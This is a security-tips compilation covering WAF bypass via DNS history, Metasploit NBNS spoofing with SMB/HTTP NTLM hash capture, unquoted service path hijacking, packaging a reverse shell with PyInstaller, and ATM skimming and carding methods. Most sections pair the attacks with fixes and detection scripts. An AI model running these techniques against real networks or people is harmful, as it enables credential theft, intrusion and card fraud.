--- UnderCode ---
Key and Certificate Formats
Private keys and certificates can be stored in several formats, so you will often have to convert from one to another. The most common formats are:
1. Binary (DER) certificate
Contains an X.509 certificate in raw form, using DER ASN.1 encoding.
2. ASCII (PEM) certificate(s)
Contains a base64-encoded DER certificate with -----BEGIN CERTIFICATE----- as the header and -----END CERTIFICATE----- as the footer. Usually found with only one certificate per file, although some programs accept more than one, depending on the context. For example, older versions of the Apache web server required the server certificate in one file and all intermediate certificates in another; Apache 2.4.8 and later accept the whole chain in SSLCertificateFile.
3. Binary (DER) key
Contains the private key in raw form, using DER ASN.1 encoding. OpenSSL 1.x creates keys in its own traditional (SSLeay) format; the alternative is PKCS#8 (defined in RFC 5208, updated by RFC 5958), which OpenSSL 3.x writes by default. OpenSSL converts between the two with the pkcs8 command.
4. ASCII (PEM) key
Contains a DER-encoded key in base64, sometimes with additional metadata (for example, the algorithm used for password protection). The header line tells the variants apart: -----BEGIN RSA PRIVATE KEY----- is the traditional format, -----BEGIN PRIVATE KEY----- is unencrypted PKCS#8, and -----BEGIN ENCRYPTED PRIVATE KEY----- is encrypted PKCS#8.
5. PKCS#7 certificate(s)
A complex format for transporting signed or encrypted data, defined in RFC 2315. It is usually found with the extensions .p7b and .p7c and can optionally include the entire certificate chain, but it has no place for a private key. This format is supported by the Java keytool utility.
6. PKCS#12 (PFX) key and certificate(s)
A complex format, defined in RFC 7292, that can store and protect a server key together with the entire certificate chain. Commonly encountered with the extensions .p12 and .pfx. It is widely used in Microsoft products and for client certificates. Nowadays the name PFX is used as a synonym for PKCS#12, although in the past PFX meant a different (earlier) version of the format; you are unlikely to meet the old version anywhere.
enjoy
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
Firewall Bypass for Cloudflare, Incapsula, SUCURI Web Applications: Possible?
Web application firewalls (WAF) are either web server add-ons (modules such as mod_security for Apache) or services (such as Cloudflare, Incapsula, SUCURI) that inspect each request before it reaches the web application and block or modify it if it looks dangerous.
Application firewalls can additionally perform intrusion detection and prevention functions.
If the WAF is a web server module, it runs on the same server as the site. If the WAF is a separate service, the scheme is as follows:
1) The website to be protected runs on its own server, with no protection of its own.
2) In the site's DNS A record, the IP addresses of the WAF service (Cloudflare, Incapsula, SUCURI or another) are published instead of the server's real address.
3) When a client connects to the protected site, every request therefore goes to the WAF service first.
4) The service receives the request, inspects it, forwards it to the origin server (which, remember, is not protected by anything itself), receives the page or data from it and returns the result to the client.
For an ordinary visitor there is no difference; everything happens unnoticed. For a website audit, however, a WAF is an obstacle. It blocks malicious requests and protects against (D)DoS. Requests from scripts (bots) may not get through at all: they are filtered at the first stage or stopped at a captcha, which makes it impossible to use tools such as WPScan, sqlmap and other scanners to look for vulnerabilities and assess the site's security. For a WAF built into the server (for example, mod_security) only one bypass option exists: crafting requests that slip past its pattern-based rules. For a WAF service there are two:
1) the same as for a regular WAF, that is, trying to outsmart the rules;
2) sending requests directly to the origin server, bypassing the WAF.
The second option only works when the origin accepts connections from anyone. Its real address leaks through historical DNS records (the A record that pointed at it before the WAF was put in front), through other subdomains that were never moved behind the WAF, through mail headers, or through certificates issued for the name. On the defender's side the fix is to make the origin accept traffic only from the WAF provider's published IP ranges (Cloudflare publishes its list at https://www.cloudflare.com/ips/) and, where the provider supports it, to require a client certificate from the WAF on the origin (Cloudflare calls this Authenticated Origin Pulls); then a leaked origin address is of no use.
Installation & run:
Installing "Bypass firewalls by abusing DNS history" on Kali Linux:
1. sudo apt install jq
2. git clone https://github.com/vincentcox/bypass-firewalls-by-DNS-history
3. cd bypass-firewalls-by-DNS-history/
4. bash bypass-firewalls-by-DNS-history.sh --help
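The two checks that the DNS-history technique rests on, written out by hand as an added example (this is not code from the original post or from the linked tool): first, is a historical A record really the origin or just another address of the WAF itself, answered with a pure-shell IPv4-in-CIDR test; second, does that address serve the site when asked for the hostname directly, answered with curl and --resolve so the name is pinned to the candidate IP without touching DNS. WAF_PREFIXES is a short illustrative subset of provider ranges; refresh it from the providers' published lists before relying on it. The documentation addresses and function names are this example's own.

```shell
#!/bin/sh
# Added example: classify candidate origin addresses and probe one directly.
set -eu

# Illustrative subset only; take current ranges from the providers
# (e.g. https://www.cloudflare.com/ips/).
WAF_PREFIXES="104.16.0.0/13 198.41.128.0/17 199.83.128.0/21"

# Dotted-quad IPv4 -> 32-bit integer.
ip2int() {
    old_ifs=$IFS; IFS=.
    set -- $1
    IFS=$old_ifs
    echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}

# Return 0 when IPv4 $1 lies inside CIDR $2 (e.g. 104.16.0.0/13).
ip_in_cidr() {
    net="${2%/*}"; bits="${2#*/}"
    mask=$(( (4294967295 << (32 - bits)) & 4294967295 ))
    [ $(( $(ip2int "$1") & mask )) -eq $(( $(ip2int "$net") & mask )) ]
}

# "waf" if the address belongs to a WAF edge, otherwise "candidate".
classify_ip() {
    for p in $WAF_PREFIXES; do
        if ip_in_cidr "$1" "$p"; then echo waf; return 0; fi
    done
    echo candidate
}

# First <title> of an HTML document on stdin (enough to compare two fetches).
title_of() {
    sed -n 's/.*<title>\([^<]*\)<\/title>.*/\1/p' | head -n 1
}

# Network step (not run by default): fetch through the WAF and straight from
# the candidate with Host header and SNI pinned by --resolve. -k because the
# origin may present a certificate that does not match the name.
probe_origin() {
    host="$1"; ip="$2"
    via_waf="$(curl -sk --max-time 10 "https://$host/" | title_of)"
    direct="$(curl -sk --max-time 10 --resolve "$host:443:$ip" "https://$host/" | title_of)"
    if [ -n "$direct" ] && [ "$direct" = "$via_waf" ]; then
        echo "$ip: serves $host with the same title, likely the origin"
    else
        echo "$ip: no match"
    fi
}

# Offline demonstration on constructed addresses (203.0.113.0/24 is the
# documentation range).
for ip in 104.16.1.1 198.41.200.7 203.0.113.5; do
    echo "$ip $(classify_ip "$ip")"
done
```

Usage against a real target is `probe_origin www.example.com 203.0.113.5` for each address that classify_ip reports as a candidate. Comparing only the title keeps false positives down when the origin serves a default vhost page; for a stricter comparison hash the whole body.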
Random Linux tips:
> Configure two Tomcat project deployments on one virtual machine
> Turn off the firewall and SELinux (acceptable only in a throwaway lab; on any host reachable from a network keep both on and open just the Tomcat ports with firewall-cmd instead)
[root@keiv ~]# systemctl stop firewalld
[root@keiv ~]# systemctl disable firewalld
Removed symlink /etc/systemd/system/multi-user.target.wants/firewalld.service.
Removed symlink /etc/systemd/system/dbus-org.fedoraproject.FirewallD1.service.
[root@keiv ~]# setenforce 0
[root@keiv ~]# sed -ri 's/^(SELINUX=).*/\1disabled/g' /etc/selinux/config
Install the JDK environment
[root@keiv ~]# yum -y install java-1.8.0-openjdk java-1.8.0-openjdk-devel
[root@keiv ~]# java -version
openjdk version "1.8.0_181"
OpenJDK Runtime Environment (build 1.8.0_181-b13)
OpenJDK 64-Bit Server VM (build 25.181-b13, mixed mode)
Tomcat deployment
Download Tomcat (9.0.8 is a 2018 release; pick a current one from https://tomcat.apache.org/ and verify the download against the .sha512 or .asc file published next to it before unpacking)
[root@keiv ~]# cd /usr/src/
[root@keiv src]# wget https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.8/bin/apache-tomcat-9.0.8.tar.gz
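The same two-instance lab with the host protections left on, as an added example that is not part of the original post: instead of stopping firewalld and disabling SELinux it opens only the connector ports, and before unpacking it checks the tarball against the .sha512 file Apache publishes beside it (the .asc signature is the stronger check; verify it too when gpg is available). The instance directories, the second instance's port 8081 and the sample file in the self-check are this example's assumptions; the port must match what you set in that instance's server.xml.

```shell
#!/bin/sh
# Added example: open ports instead of disabling the firewall, and verify
# the Tomcat tarball before unpacking it.
set -eu

TOMCAT_URL="https://archive.apache.org/dist/tomcat/tomcat-9/v9.0.8/bin/apache-tomcat-9.0.8.tar.gz"

# Lowercase hex SHA-512 of a file (coreutils sha512sum or BSD shasum).
sha512_of() {
    if command -v sha512sum >/dev/null 2>&1; then
        sha512sum "$1" | awk '{print $1}'
    else
        shasum -a 512 "$1" | awk '{print $1}'
    fi
}

# Compare a file to an Apache-style sidecar ("<hex> *<name>" or "<hex>  <name>").
verify_sha512() {
    expected="$(awk 'NR == 1 {print tolower($1)}' "$2")"
    [ -n "$expected" ] && [ "$expected" = "$(sha512_of "$1")" ]
}

# Keep firewalld and SELinux; open only the HTTP connectors of both instances.
open_tomcat_ports() {
    firewall-cmd --permanent --add-port=8080/tcp
    firewall-cmd --permanent --add-port=8081/tcp
    firewall-cmd --reload
    getenforce    # should still report Enforcing
}

# Download, verify, and unpack the same tarball twice (one tree per instance).
fetch_and_unpack() {
    tarball="$(basename "$TOMCAT_URL")"
    cd /usr/src
    curl -fsSLO "$TOMCAT_URL"
    curl -fsSLO "$TOMCAT_URL.sha512"
    if ! verify_sha512 "$tarball" "$tarball.sha512"; then
        echo "checksum mismatch for $tarball, refusing to unpack" >&2
        return 1
    fi
    for inst in tomcat1 tomcat2; do
        mkdir -p "/usr/local/$inst"
        tar xzf "$tarball" -C "/usr/local/$inst" --strip-components=1
    done
}

# Offline self-check of the verifier on a constructed file: a correct sidecar
# must pass, and the same file altered afterwards must fail.
selfcheck() {
    d="$(mktemp -d)"
    printf 'constructed tarball bytes\n' > "$d/t.tar.gz"
    printf '%s *t.tar.gz\n' "$(sha512_of "$d/t.tar.gz")" > "$d/t.tar.gz.sha512"
    if verify_sha512 "$d/t.tar.gz" "$d/t.tar.gz.sha512"; then r1=match; else r1=mismatch; fi
    printf 'x' >> "$d/t.tar.gz"
    if verify_sha512 "$d/t.tar.gz" "$d/t.tar.gz.sha512"; then r2=match; else r2=mismatch; fi
    rm -rf "$d"
    echo "$r1 $r2"
}

selfcheck
```

On the real host run `open_tomcat_ports` and `fetch_and_unpack` as root; the self-check above needs no network and no privileges.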
Top ways ATMs get hacked, and how to secure against them
Fraud investigators (the "electronic Sherlock Holmeses" of card crime) distinguish nine main types of card fraud:
1. Transactions with counterfeit cards.
2. Transactions with stolen or lost cards.
3. Multiple charges for the same goods or services.
4. Mail-order and telephone-order fraud.
5. Repeated withdrawals from the same account.
6. Fraud using forged sales slips.
7. Fraudulent cash withdrawals at ATMs.
8. Attaching an electronic recording device to a POS terminal or ATM (skimming).
9. Other types of fraud.
TOP 7 WAYS CRIMINALS STEAL CARD MONEY:
First way
Scammers often use devices that, once fitted to an ATM, capture card data. These can be overlays placed over the keypad that look exactly like the original buttons. The cardholder withdraws money without any problem, but the fake keypad records every key pressed, the PIN included. Tip: look closely at the keypad of an unfamiliar ATM before using it.
Second way
Another device is what is known in English as the Lebanese loop. It is a plastic sleeve slightly larger than a card, inserted into the ATM's card slot. The cardholder tries to withdraw money, but the ATM cannot read the magnetic stripe, and because of the sleeve's design it cannot return the card either. At this point the attacker walks up and says the same thing happened to him only yesterday: to get the card back, you just enter the PIN and press Cancel twice. The cardholder tries it and, of course, nothing happens. He concludes that the ATM has kept the card and leaves to call the bank. The fraudster then calmly pulls the card out together with the sleeve using a simple tool. He already knows the PIN: the (now former) cardholder entered it himself in his presence. All that remains is to withdraw the money.
Third way
Technically difficult, but possible: intercept the data the ATM sends to the bank to verify that the requested amount is available in the account. For this the fraudsters have to tap the appropriate cable and read the data. Given that the relevant instructions are easy to find on the Internet and technology keeps advancing, this option is likely to be seen more and more often.
The fourth way
To learn the PIN, some scammers leave a miniature video camera nearby while they sit in a car parked close by with a laptop, on whose screen the digits entered by the cardholder are visible. Cover the keypad with your free hand when entering a PIN.
Fifth way
Expensive, but reliable. There have been cases of fraudsters installing their own "ATM" in a crowded place. It does not work, of course, and never dispenses any money, but it happily reads all the data from every card inserted. Later it turns out that you withdrew all the money from your account yesterday and for some reason cannot remember doing so.
Sixth way
At one time, fraudsters in the UAE fitted devices into the card slots of ATMs that recorded the data of every card inserted. The criminals then only had to obtain the PIN, either by the first or fourth method above or simply by looking over the victim's shoulder.
Method Seven
> This one you cannot fight; you can only accept it. Nothing here depends on your attentiveness, caution or prudence. Sometimes the people who get at your card do so very simply because they are in league with the scammers: bank employees, for example. This happens very rarely, but nobody is immune to it.
> Cardholders are not the only victims. Large firms, shops and banks suffer too, and there the losses run to hundreds of thousands of dollars, sometimes millions.
> Law enforcement specialists in many countries consider crimes committed with payment cards to be among the most dangerous economic crimes. They are committed not only inside the banks' computer systems but also over the Internet.
> According to some reports, there are today about 30 types of illegal card transactions over the World Wide Web. The most common are payment with non-existent cards, the creation of fake online shops, electronic theft and fake payments in gambling establishments.
> A special term even arose: carding, the illegal use of bank cards to buy goods or services over the Internet. A carder either obtains the details of a real card or generates data that every system will accept as real. Links to sites that openly sell stolen card data are easy to find. The going price for a card is from 40 cents to 5 dollars. Most sellers are in the former USSR, buyers are concentrated in the Far East, and the victims are mainly citizens of the USA and Europe. According to the FBI, Ukraine and Russia have earned a reputation as home to the most skilled hackers.
> These virtual bazaars work almost like real exchanges, with prices fluctuating with demand. They sit on hacked pages and are therefore short-lived; most survive only a couple of days. Experts agree that the centre of global carding is St. Petersburg, where cards leave the counter in batches of 500 to 5,000 at a price of $1 apiece.
> Card data is obtained by breaking into large firms. For example, after refusing to pay a hacker for his silence, the online retailer CD Universe admitted in January 2000 to losing a database of 300,000 cards. England alone lost 411 million pounds to carding in 2003; by 2005 this figure had risen to a billion, which is why 25 million pounds were allocated to fighting cybercrime.
NBNS Spoof / Capture
[>] NBNS Spoof
msf > use auxiliary/spoof/nbns/nbns_response
msf auxiliary(nbns_response) > show options
msf auxiliary(nbns_response) > set INTERFACE eth0
msf auxiliary(nbns_response) > set SPOOFIP 10.10.10.10
msf auxiliary(nbns_response) > run
[>] SMB Capture
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /tmp/john_smb
msf auxiliary(smb) > run
[>] HTTP NTLM Capture
msf > use auxiliary/server/capture/http_ntlm
msf auxiliary(http_ntlm) > set JOHNPWFILE /tmp/john_http
msf auxiliary(http_ntlm) > set SRVPORT 80
msf auxiliary(http_ntlm) > set URIPATH /
msf auxiliary(http_ntlm) > run
How the three fit together: nbns_response answers every broadcast NetBIOS name query seen on INTERFACE with SPOOFIP, which should be the address of the host running the two capture servers. A client that looks up a name DNS cannot resolve (a mistyped share, a stale drive mapping, a proxy auto-discovery name) is sent to that address, connects to the fake SMB or HTTP server and authenticates with NTLM; the challenge/response pairs land in JOHNPWFILE in John the Ripper format for offline cracking.
Fix:
http://www.leonteale.co.uk/netbios-nbns-spoofing/
Solution
The solution is to stop NetBIOS name resolution, and with it the broadcast queries the spoofer answers. The setting lives in a place you have probably seen many times without paying much attention to it.
> NetBIOS, according to Microsoft, has not been needed since Windows 2000.
There are, however, a few side effects.
One unexpected consequence of disabling NetBIOS completely on your network is the effect on trusts between forests. Windows 2000 let you create an external (non-transitive) trust between a domain in one forest and a domain in another so that users in one forest could access resources in the trusting domain of the other. Windows Server 2003 went a step further with a new type of two-way transitive trust, the forest trust, which lets users in any domain of one forest access resources in any domain of the other. Surprisingly, NetBIOS is still used while the trust is created, even though Microsoft has officially deprecated it since Windows 2000. So if you disable NetBIOS on your domain controllers, you will not be able to establish a forest trust between two Windows Server 2003 forests.
Windows Server 2003 is old, though (at the time of writing most environments run Windows Server 2012), so if you want to disable NetBIOS on your servers and the forest-trust side effect bites, the right move is to upgrade anyway. Failing that, you can at the very least disable NetBIOS on your workstations.
Two caveats the original guide leaves out. First, the "Use NetBIOS setting from the DHCP server" option only disables NetBIOS if your DHCP server actually hands out the Microsoft vendor option "001 Microsoft Disable Netbios Option" with the value 2; on a network without that option, choose "Disable NetBIOS over TCP/IP" explicitly, or push it by policy through the registry value NetbiosOptions = 2 under HKLM\SYSTEM\CurrentControlSet\Services\NetBT\Parameters\Interfaces\Tcpip_{adapter GUID}. Second, the same spoofing tools also answer LLMNR and mDNS queries, so disable LLMNR as well (Group Policy: Computer Configuration > Administrative Templates > Network > DNS Client > "Turn off multicast name resolution" = Enabled) and require SMB signing, which stops a captured NTLM exchange being relayed to another host even though it can still be cracked offline.
See below for step-by-step instructions on disabling NetBIOS on workstations:
Windows XP, Windows Server 2003 and Windows 2000
On the desktop, right-click My Network Places, and then click Properties.
Right-click Local Area Connection, and then click Properties.
In the "Components checked are used by this connection" list, double-click Internet Protocol (TCP/IP), click Advanced, and then click the WINS tab. Note: in Windows XP and Windows Server 2003 the list is called "This connection uses the following items".
Select Disable NetBIOS over TCP/IP (or Use NetBIOS setting from the DHCP server, but only if your DHCP server publishes the disable option), and then click OK three times.
For Windows Vista
On the desktop, right-click Network, and then click Properties.
Under Tasks, click Manage network connections.
Right-click Local Area Connection, and then click Properties.
In the "This connection uses the following items" list, double-click Internet Protocol Version 4 (TCP/IPv4), click Advanced, and then click the WINS tab.
Select Disable NetBIOS over TCP/IP (or Use NetBIOS setting from the DHCP server, as above), and then click OK three times.
For Windows 7, 8 and 10
Click Start, and then click Control Panel.
Under Network and Internet, click View network status and tasks.
Click Change adapter settings.
Right-click Local Area Connection, and then click Properties.
In the "This connection uses the following items" list, double-click Internet Protocol Version 4 (TCP/IPv4), click Advanced, and then click the WINS tab.
Select Disable NetBIOS over TCP/IP (or Use NetBIOS setting from the DHCP server, as above), and then click OK three times.
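The other side of the attack above, as an added example that is not part of the original post: spotting a rogue NBNS responder such as nbns_response from a packet capture. NetBIOS name queries are broadcast and only WINS servers should answer them, so any other host sending "QUERY; POSITIVE; RESPONSE" packets is answering queries it has no business answering. The input is tcpdump's one-line text output for UDP port 137; the capture lines and the WINS allow-list below are constructed for the demonstration.

```shell
#!/bin/sh
# Added example: find hosts answering NetBIOS name queries that are not WINS
# servers, from `tcpdump -nn udp port 137` text output.
set -eu

WINS_SERVERS="10.10.10.2"

# Constructed capture: workstations .21-.23 broadcast queries, .10 (the
# attacker's SPOOFIP) answers all of them, .2 is the legitimate WINS server.
SAMPLE='12:00:01.000101 IP 10.10.10.21.137 > 10.10.10.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
12:00:01.000842 IP 10.10.10.10.137 > 10.10.10.21.137: NBT UDP PACKET(137): QUERY; POSITIVE; RESPONSE; UNICAST
12:00:03.114220 IP 10.10.10.22.137 > 10.10.10.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
12:00:03.115004 IP 10.10.10.10.137 > 10.10.10.22.137: NBT UDP PACKET(137): QUERY; POSITIVE; RESPONSE; UNICAST
12:00:03.120330 IP 10.10.10.2.137 > 10.10.10.22.137: NBT UDP PACKET(137): QUERY; POSITIVE; RESPONSE; UNICAST
12:00:07.002911 IP 10.10.10.23.137 > 10.10.10.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
12:00:07.003590 IP 10.10.10.10.137 > 10.10.10.23.137: NBT UDP PACKET(137): QUERY; POSITIVE; RESPONSE; UNICAST'

# Read capture text on stdin; for every positive responder not in the
# allow-list ($1, space separated) print "<ip> <responses> <distinct victims>".
nbns_rogue_responders() {
    awk -v allow="$1" '
        BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
        /NBT UDP PACKET\(137\): QUERY; POSITIVE; RESPONSE/ {
            src = $3; sub(/\.[0-9]+$/, "", src)      # "10.10.10.10.137"  -> "10.10.10.10"
            dst = $5; sub(/\.[0-9]+:$/, "", dst)     # "10.10.10.21.137:" -> "10.10.10.21"
            if (src in ok) next
            cnt[src]++
            if (!((src, dst) in seen)) { seen[src, dst] = 1; victims[src]++ }
        }
        END { for (s in cnt) print s, cnt[s], victims[s] }
    ' | sort -k2,2nr
}

# Run the detector over the constructed sample.
demo() {
    printf '%s\n' "$SAMPLE" | nbns_rogue_responders "$WINS_SERVERS"
}

demo
```

On a live network capture to a file first (`tcpdump -nn -i eth0 udp port 137 > nbns.txt`) and then run `nbns_rogue_responders "$WINS_SERVERS" < nbns.txt`; the awk END block only reports once the input ends. A single host answering for many different victims is the signature of a spoofer, since a real WINS server only answers for names it holds.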
- topic: git sources
[+] Weak SSH Ciphers
The finding is that sshd still offers RC4 (arcfour*), CBC-mode ciphers or SHA-1/RIPEMD-160 MACs. The lines older cheat sheets give as the fix (Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,arcfour and MACs hmac-sha1,hmac-ripemd160) are themselves the weak set: RC4 and hmac-ripemd160 were removed from OpenSSH 7.6 altogether, and hmac-sha1 is exactly what the finding tells you to drop. Use a current set instead:
sudo nano /etc/ssh/sshd_config
Add the following lines:
Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr
MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,umac-128-etm@openssh.com
> Restart SSH (check the file with sshd -t first: a typo in either line keeps sshd from starting and locks everyone out)
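A check for the finding, as an added example that is not part of the original post: it audits what sshd actually negotiates by reading the output of `sshd -T` (the effective configuration including compiled-in defaults) rather than the config file, because a missing Ciphers or MACs line means "whatever this build's defaults are". The weak-algorithm lists and the two sample `sshd -T` outputs are this example's own; extend the lists to match your policy.

```shell
#!/bin/sh
# Added example: flag weak ciphers, MACs and key exchanges in `sshd -T` output.
set -eu

WEAK_CIPHERS="arcfour arcfour128 arcfour256 3des-cbc aes128-cbc aes192-cbc aes256-cbc blowfish-cbc cast128-cbc rijndael-cbc@lysator.liu.se"
WEAK_MACS="hmac-md5 hmac-md5-96 hmac-sha1 hmac-sha1-96 hmac-ripemd160 hmac-md5-etm@openssh.com hmac-md5-96-etm@openssh.com hmac-sha1-etm@openssh.com hmac-sha1-96-etm@openssh.com hmac-ripemd160-etm@openssh.com umac-64@openssh.com umac-64-etm@openssh.com"
WEAK_KEX="diffie-hellman-group1-sha1 diffie-hellman-group14-sha1 diffie-hellman-group-exchange-sha1"

# Read `sshd -T` output on stdin; print "<keyword> <algorithm>" for every
# weak algorithm offered. Prints nothing when the configuration is clean.
audit_sshd_T() {
    awk -v c="$WEAK_CIPHERS" -v m="$WEAK_MACS" -v k="$WEAK_KEX" '
        BEGIN {
            n = split(c, a, " "); for (i = 1; i <= n; i++) weak["ciphers", a[i]] = 1
            n = split(m, a, " "); for (i = 1; i <= n; i++) weak["macs", a[i]] = 1
            n = split(k, a, " "); for (i = 1; i <= n; i++) weak["kexalgorithms", a[i]] = 1
        }
        $1 == "ciphers" || $1 == "macs" || $1 == "kexalgorithms" {
            n = split($2, algs, ",")
            for (i = 1; i <= n; i++) if (($1, algs[i]) in weak) print $1, algs[i]
        }'
}

# Exit 0 when nothing weak is offered, 1 otherwise (stdin as above).
sshd_is_clean() {
    [ -z "$(audit_sshd_T)" ]
}

# Constructed `sshd -T` excerpt from a host still carrying the old cheat-sheet lines.
SAMPLE_BAD='port 22
ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,arcfour
macs hmac-sha1,hmac-ripemd160
kexalgorithms curve25519-sha256,diffie-hellman-group14-sha1'

# Constructed excerpt from a host with the corrected lines.
SAMPLE_GOOD='ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes256-ctr
macs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com
kexalgorithms curve25519-sha256,diffie-hellman-group16-sha512'

# Number of weak algorithms in a given sample.
weak_count() {
    printf '%s\n' "$1" | audit_sshd_T | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_BAD" | audit_sshd_T
```

On a live host run `sudo sshd -T | audit_sshd_T`; `ssh -Q cipher`, `ssh -Q mac` and `ssh -Q kex` list what the installed build supports, which is useful when a hardened list fails to parse on an older OpenSSH.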
[+] Unquoted Service Paths
A service whose ImagePath contains spaces and is not quoted (for example C:\Program Files (x86)\Vuln\Vuln Software 7.0\software.exe) is started by Windows trying C:\Program.exe, then C:\Program Files (x86)\Vuln\Vuln.exe, and so on, before the real binary. If a low-privileged user can write to any of those directories, dropping an executable there gets it run as the service account (usually SYSTEM) the next time the service starts.
Fix: run Regedit, browse to HKLM\SYSTEM\CurrentControlSet\services, find the service in question and add " " on either side of the ImagePath string.
Check the permissions on the binary, and on every directory along the path that Windows would try first:
C:\Users\user>icacls "C:\Program Files (x86)\Vuln\Vuln Software 7.0\software.exe"
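The unquoted-service-path check itself, as an added example that is not part of the original post, run over a constructed copy of the output of `wmic service get Name,PathName,StartMode /format:csv` as you would paste it from the target. A service is flagged when its executable path is not quoted, contains a space, and lies outside C:\Windows (which low-privileged users cannot write to anyway); hijack_candidates then lists the paths Windows tries before the real one, each of which deserves an icacls check on its parent directory. The sample services are invented for the demonstration.

```shell
#!/bin/sh
# Added example: find unquoted service paths in wmic CSV output and list the
# file names Windows would try before the real executable.
set -eu

# Constructed wmic CSV output (no real services).
SAMPLE='Node,Name,PathName,StartMode
HOST1,Spooler,C:\Windows\System32\spoolsv.exe,Auto
HOST1,VulnSvc,C:\Program Files (x86)\Vuln\Vuln Software 7.0\software.exe,Auto
HOST1,GoodSvc,"C:\Program Files\Good\Good Software\good.exe",Auto
HOST1,ArgSvc,C:\Tools\agent.exe -config C:\ProgramData\agent.cfg,Auto
HOST1,OtherSvc,C:\Other Dir\svc.exe,Manual'

# Read wmic CSV on stdin; print "<service>: <executable>" for each finding.
unquoted_service_paths() {
    awk -F, 'NR > 1 && NF >= 4 {
        path = $3
        pos = index(tolower(path), ".exe")                 # ignore arguments after the exe
        exe = (pos > 0) ? substr(path, 1, pos + 3) : path
        if (substr(exe, 1, 1) == "\"") next                 # already quoted
        if (tolower(substr(exe, 1, 11)) == "c:\\windows\\") next
        if (index(exe, " ") > 0) print $2 ": " exe
    }'
}

# Paths CreateProcess tries for an unquoted ImagePath, in order: the prefix
# up to each space with ".exe" appended, and only then the full path.
hijack_candidates() {
    printf '%s\n' "$1" | awk '{
        for (i = 1; i <= length($0); i++)
            if (substr($0, i, 1) == " ") print substr($0, 1, i - 1) ".exe"
    }'
}

# Number of flagged services in the sample.
finding_count() {
    printf '%s\n' "$SAMPLE" | unquoted_service_paths | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE" | unquoted_service_paths
hijack_candidates 'C:\Program Files (x86)\Vuln\Vuln Software 7.0\software.exe'
```

ArgSvc is deliberately not flagged: the space sits in the arguments, after the executable name, so it does not change how the binary path is parsed. GoodSvc shows the fixed form the Regedit step above produces.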
PyInstaller (Windows and Linux)
#FastTips
The original command, PyInstaller 2.1 run from its unpacked folder on Windows:
python.exe c:\Python27\PyInstaller-2.1\pyinstaller.py --noconsole --onefile c:\Python27\PyInstaller-2.1\ReverseShell.py
Current releases install a pyinstaller command (pip install pyinstaller), so the same build is:
pyinstaller --noconsole --onefile ReverseShell.py
+ The first build also writes the .spec file next to the script.
+ Windows: you want a single EXE with all your data in it, hence --onefile. --noconsole (alias --windowed) hides the console window on Windows and produces a .app bundle on macOS; PyInstaller ignores it on Linux.
+ To rebuild (for example after editing the spec to add data files or hidden imports), build from the spec instead of the script:
pyinstaller yourmainfile.spec
+ Look for your .exe, .app bundle or Linux ELF binary in the dist directory.
+ Build on the platform you target: PyInstaller does not cross-compile. A --onefile binary also unpacks itself into a temporary _MEIxxxxxx directory every time it starts, and the bundled archive carries a fixed magic value, so such binaries are easy for endpoint products to recognise.
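How a defender recognises a PyInstaller build, as an added example that is not part of the original post and not code from PyInstaller itself: every PyInstaller executable carries a CArchive "cookie" whose magic is the eight bytes MEI \014 \013 \012 \013 \016, appended at the end of the bundled archive. The check below searches for that magic in the hex dump of a file, because the magic contains a newline byte and a raw grep would split on it. The two sample files are constructed here, not real binaries.

```shell
#!/bin/sh
# Added example: classify a file as PyInstaller-built or not by its cookie magic.
set -eu

# "MEI\014\013\012\013\016" as od -tx1 prints it; the leading space keeps the
# match aligned on byte boundaries.
PYI_MAGIC_HEX=' 4d 45 49 0c 0b 0a 0b 0e'

# Print "pyinstaller" if the file contains the cookie magic, else "other".
classify_binary() {
    if LC_ALL=C od -An -tx1 -v "$1" | tr -d '\n' | tr -s ' ' | grep -q "$PYI_MAGIC_HEX"; then
        echo pyinstaller
    else
        echo other
    fi
}

# Build two constructed samples: one with the cookie appended after some
# archive-looking bytes, one without. Returns "<packed> <plain>".
demo() {
    d="$(mktemp -d)"
    printf 'ELF-or-PE-header-goes-here\n' > "$d/plain.bin"
    cp "$d/plain.bin" "$d/packed.bin"
    printf 'python310.dll\000' >> "$d/packed.bin"
    printf 'MEI\014\013\012\013\016' >> "$d/packed.bin"
    printf '\000\000\000\000' >> "$d/packed.bin"
    r="$(classify_binary "$d/packed.bin") $(classify_binary "$d/plain.bin")"
    rm -rf "$d"
    echo "$r"
}

demo
```

Run `classify_binary dist/ReverseShell` (or the .exe) on your own build to see that the magic survives --onefile; on a fleet, the same test over files in users' temp directories, together with the _MEIxxxxxx directory name, is a cheap triage signal.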